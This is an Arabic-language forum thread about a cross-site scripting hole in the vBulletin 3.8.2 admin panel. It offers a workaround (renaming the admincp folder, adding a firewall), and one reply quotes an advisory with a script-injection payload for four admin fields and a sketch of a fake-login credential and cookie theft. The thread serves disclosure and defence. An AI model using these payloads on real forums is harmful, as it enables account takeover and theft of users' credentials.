[ترقيع] ثغرة vBulletin 3.8.2 adminCP Cross-Site

**Protection** · 05-03-2009 07:44 PM

السلام عليكم ...
اليوم أتيت إليكم بترقيع لثغرة النسخة 3.8.2 ...

وهي تكمن في مجلد admincp ..

والترقيع وهي تغير مسار مجلد الـadmincp كا أسم وتغيره من ملف الكونفيكت أيضاً .. إضافتاً إلى وضع الجدار الناري عليه للأهمية ...

ولكم مني خالص الإحترام والتقدر

Protection

**Marcel Adam** · 05-05-2009 03:35 AM

بارك الله فيك لكن يرجى شرح اكثر للثغرة و مصدر الخبر

تحياتي لك

**max2008** · 05-05-2009 05:09 PM

بسم الله

الثغره

رمز Code:الثغرة


vBulletin 3.8.2 adminCP Cross-Site Scripting

R.I.P DrtRp - We miss you

---------------------------------------------

Original Post at http://forum.aria-security.com/en/showthread.php?p=1179

Greetz to Aura & all Aria-Security Mods & Members



These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.



1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.



<script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

or any other XSS code.



2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.



<script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>



3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.



<script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>



4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.

<script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..

يعني الثغره زي Add a new title+Post Icons+post new Smilies

.. حل الثغره ..

تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

و ان شاء الله ينزل ترقيع رسمي

**Protection** · 05-06-2009 02:31 PM

السلام عليكم ..

حضراتكم قد اتيتم بطريقة إستثمار الثغرة !! ؟؟

وهذا شئ غير مقبول أعتقده حتى لا تقع بيد من لا يخاف الله ويقوم بإستغلال الثغرة واللهو بوضع إندكساته في المنتديات العربية والمسلمة !!

أعذروني لكني لست موافق عما حدث

**EgyCode** · 05-25-2009 11:03 PM

شكرا على الترقيع وإلى الأمام دائما اخوانى

***الدالى*** · 05-26-2009 10:47 PM

المشاركة الأصلية كتبت بواسطة protection

السلام عليكم ..

حضراتكم قد اتيتم بطريقة إستثمار الثغرة !! ؟؟

وهذا شئ غير مقبول أعتقده حتى لا تقع بيد من لا يخاف الله ويقوم بإستغلال الثغرة واللهو بوضع إندكساته في المنتديات العربية والمسلمة !!

أعذروني لكني لست موافق عما حدث

لكن يا غالى هذه فقط فكرة الثغرة ولا يوجد فيها طريقة
استغلال الثغرة مجرد توضيح للفكرة فقط
و بالتوفيق لك ان شاء الله